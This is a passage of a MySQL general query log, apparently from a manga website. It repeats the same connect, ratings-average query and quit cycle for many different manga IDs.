where manga_id = '46' order by created desc 330655016 Quit 330655017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330655017 Quit 330655018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330655018 Quit 330655019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330655019 Quit 330655020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330655020 Quit 330655021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330655021 Quit 330655022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330655022 Quit 330655023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330655023 Quit 330655024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330655024 Quit 330655025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330655025 Quit 330655026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330655026 Quit 330655027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330655027 Quit 330655028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330655028 Quit 330655029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330655029 Quit 330655030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330655030 Quit 330655031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330655031 Quit 330655032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330655032 Quit 330655033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330655033 Quit 330655034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330655034 Quit 330655035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330655035 Quit 330655036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330655036 Quit 330655037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330655037 Quit 330655038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330655038 Quit 330655039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330655039 Quit 330655040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330655040 Quit 330655041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330655041 Quit 330655042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330655042 Quit 330655043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330655043 Quit 330655044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330655044 Quit 330655045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330655045 Quit 330655046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330655046 Quit 330655047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330655047 Quit 330655048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330655048 Quit 330655049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330655049 Quit 330655050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330655050 Quit 330655051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330655051 Quit 330655052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330655052 Quit 330655053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330655053 Quit 330655054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330655054 Quit 330655055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330655055 Quit 330655056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330655056 Quit 330655057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330655057 Quit 330655058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330655058 Quit 330655059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330655059 Quit 330655060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330655060 Quit 330655061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330655061 Quit 330655062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330655062 Quit 330655063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330655063 Quit 330655064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330655064 Quit 330655065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330655065 Quit 330655066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330655066 Quit 330655067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330655067 Quit 330655068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330655068 Quit 330655069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330655069 Quit 330655070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330655070 Quit 330655071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330655071 Quit 330655072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330655072 Quit 330655073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330655073 Quit 330655074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330655074 Quit 330655075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330655075 Quit 330655076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330655076 Quit 330655077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330655077 Quit 330655078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330655078 Quit 330655079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330655079 Quit 330655080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330655080 Quit 330655081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330655081 Quit 330655082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330655082 Quit 330655083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330655083 Quit 330655084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330655084 Quit 330655085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330655085 Quit 330655086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330655086 Quit 330655087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330655087 Quit 330655088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330655088 Quit 330655089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330655089 Quit 330655090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330655090 Quit 330655091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330655091 Quit 330655092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330655092 Quit 330655093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330655093 Quit 330655094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330655094 Quit 330655095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330655095 Quit 330655096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330655096 Quit 330655097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330655097 Quit 330655098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330655098 Quit 330655099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330655099 Quit 330655100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330655100 Quit 330655101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330655101 Quit 330655102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330655102 Quit 330655103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330655103 Quit 330655104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330655104 Quit 330655105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330655105 Quit 330655106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330655106 Quit 330655107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330655107 Quit 330655108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330655108 Quit 330655109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330655109 Quit 330655110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330655110 Quit 330655111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330655111 Quit 330655112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330655112 Quit 330655113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330655113 Quit 330655114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330655114 Quit 330655115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330655115 Quit 330655116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330655116 Quit 330655117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330655117 Quit 330655118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330655118 Quit 330655119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330655119 Quit 330655120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330655120 Quit 330655121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330655121 Quit 330655122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330655122 Quit 330655123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330655123 Quit 330655124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330655124 Quit 330655125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330655125 Quit 330655126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330655126 Quit 330655127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330655127 Quit 330655128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330655128 Quit 330655129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330655129 Quit 330655130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330655130 Quit 330655131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330655131 Quit 330655132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330655132 Quit 330655133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330655133 Quit 330655134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330655134 Quit 330655135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330655135 Quit 330655136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330655136 Quit 330655137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330655137 Quit 330655138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330655138 Quit 330655139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330655139 Quit 330655140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330655140 Quit 330655141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330655141 Quit 330655142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330655142 Quit 330655143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330655143 Quit 330655144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330655144 Quit 330655145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330655145 Quit 330655146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330655146 Quit 330655147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330655147 Quit 330655148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330655148 Quit 330655149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330655149 Quit 330655150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330655150 Quit 330655151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330655151 Quit 330655152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330655152 Quit 330655153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330655153 Quit 330655154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330655154 Quit 330655155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330655155 Quit 330655156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330655156 Quit 330655157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330655157 Quit 330655158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330655158 Quit 330655159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330655159 Quit 330655160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330655160 Quit 330655161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330655161 Quit 330655162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330655162 Quit 330655163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330655163 Quit 330655164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330655164 Quit 330655165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330655165 Quit 330655166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330655166 Quit 330655167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330655167 Quit 330655168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330655168 Quit 330655169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id 